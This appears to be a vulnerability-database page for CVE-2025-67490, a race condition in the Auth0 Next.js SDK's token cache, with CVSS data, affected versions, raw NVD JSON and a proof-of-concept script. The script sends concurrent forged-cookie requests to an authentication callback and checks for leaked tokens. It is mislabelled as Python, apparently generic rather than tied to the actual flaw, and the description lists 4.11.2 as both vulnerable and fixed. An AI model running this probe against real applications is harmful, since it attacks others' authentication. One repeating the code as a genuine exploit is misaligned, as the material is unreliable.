Security Vulnerability Report
中文
CVE-2025-67490 CVSS 5.4 MEDIUM

CVE-2025-67490

Published: 2025-12-10 23:15:49
Last Modified: 2026-03-06 19:39:31
Source: [email protected]

Description

The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. When using versions 4.11.0 through 4.11.2 and 4.12.0, simultaneous requests on the same client may result in improper lookups in the TokenRequestCache for the request results. This issue is fixed in versions 4.11.2 and 4.12.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:auth0:nextjs-auth0:4.11.0:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:auth0:nextjs-auth0:4.11.1:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:auth0:nextjs-auth0:4.12.0:*:*:*:*:node.js:*:* - VULNERABLE
Auth0 Next.js SDK >= 4.11.0 且 <= 4.11.2
Auth0 Next.js SDK = 4.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-67490 PoC - TokenRequestCache Race Condition // This PoC demonstrates the concurrent request vulnerability in Auth0 Next.js SDK const fetch = require('node-fetch'); async function exploitCVE202567490(baseUrl) { console.log('[+] Starting CVE-2025-67490 exploitation test'); console.log('[+] Target:', baseUrl); console.log('[+] Vulnerability: TokenRequestCache race condition'); // Create multiple concurrent requests to trigger cache collision const concurrentRequests = 10; const requests = []; for (let i = 0; i < concurrentRequests; i++) { requests.push( fetch(`${baseUrl}/api/auth/callback`, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Cookie': `auth0=${generateMockToken(i)}` }, body: JSON.stringify({ callbackUrl: `/user/profile?session=${i}`, state: `state_${i}_${Date.now()}` }) }) ); } // Execute all requests simultaneously console.log(`[+] Sending ${concurrentRequests} concurrent authentication requests...`); const responses = await Promise.all(requests); // Analyze responses for cache contamination const tokens = responses.map((res, idx) => ({ requestId: idx, status: res.status, token: res.headers.get('X-Auth-Token') })); console.log('\n[+] Response Analysis:'); tokens.forEach(t => { console.log(` Request ${t.requestId}: Status ${t.status}, Token: ${t.token}`); }); // Check for token contamination const uniqueTokens = new Set(tokens.map(t => t.token)); if (uniqueTokens.size < concurrentRequests) { console.log('\n[!] VULNERABLE: Cache contamination detected!'); console.log(`[!] Expected ${concurrentRequests} unique tokens, got ${uniqueTokens.size}`); return true; } console.log('\n[+] No cache contamination detected'); return false; } function generateMockToken(userId) { return Buffer.from(JSON.stringify({ sub: `user_${userId}`, aud: 'test-app', iat: Math.floor(Date.now() / 1000), exp: Math.floor(Date.now() / 1000) + 3600 })).toString('base64'); } // Usage: node poc.js https://vulnerable-app.example.com const targetUrl = process.argv[2] || 'http://localhost:3000'; exploitCVE202567490(targetUrl).catch(console.error);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67490", "sourceIdentifier": "[email protected]", "published": "2025-12-10T23:15:48.503", "lastModified": "2026-03-06T19:39:30.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. When using versions 4.11.0 through 4.11.2 and 4.12.0, simultaneous requests on the same client may result in improper lookups in the TokenRequestCache for the request results. This issue is fixed in versions 4.11.2 and 4.12.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:auth0:nextjs-auth0:4.11.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "CBE707C0-E392-4EE7-A03A-1C25BFE5DC54"}, {"vulnerable": true, "criteria": "cpe:2.3:a:auth0:nextjs-auth0:4.11.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "42224B81-6680-441E-B9E9-F4126CFCF2E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:auth0:nextjs-auth0:4.12.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "480F59EF-7D13-4DCD-82B2-50596FC6FDB1"}]}]}], "references": [{"url": "https://github.com/auth0/nextjs-auth0/commit/26cc8a7c60f4b134700912736f991a25bd6bbf0b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-wcgj-f865-c7j7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.